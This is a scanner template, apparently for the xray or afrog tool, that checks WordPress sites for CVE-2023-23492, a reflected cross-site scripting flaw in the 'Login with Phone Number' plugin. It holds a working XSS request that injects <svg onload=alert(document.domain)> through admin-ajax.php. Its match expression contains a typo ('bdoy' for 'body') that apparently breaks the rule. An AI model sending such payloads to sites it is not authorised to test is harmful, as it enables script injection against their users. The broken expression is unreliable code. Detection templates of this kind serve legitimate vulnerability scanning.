id: CVE-2023-23492

info:
  name: Login with Phone Number - Cross-Site Scripting
  author: r3Y3r53
  severity: high
  verified: false
  description: |
    Login with Phone Number, versions < 1.4.2, is affected by an reflected XSS vulnerability in the login-with-phonenumber.php' file in the 'lwp_forgot_password()' function.

    Note that CVE-2023-23492 incorrectly describes and scores this as SQL injection vulnerability.
  reference:
    - https://wordpress.org/plugins/login-with-phone-number/
    - https://www.tenable.com/security/research/tra-2023-3
    - https://nvd.nist.gov/vuln/detail/CVE-2023-23492
  tags: login-with-phonenumber,wordpress,wp,wp-plugin,xss,tenable,cve,cve2023

rules:
  r0:
    request:
      method: GET
      path: /wp-admin/admin-ajax.php?action=lwp_forgot_password&ID=<svg%20onload=alert(document.domain)>
    expression: |
      response.status == 200 && 
      response.bdoy.bcontains(b'<svg onload=alert(document.domain)>') &&
      response.body.bcontains(b'message":"Update password')
expression: r0()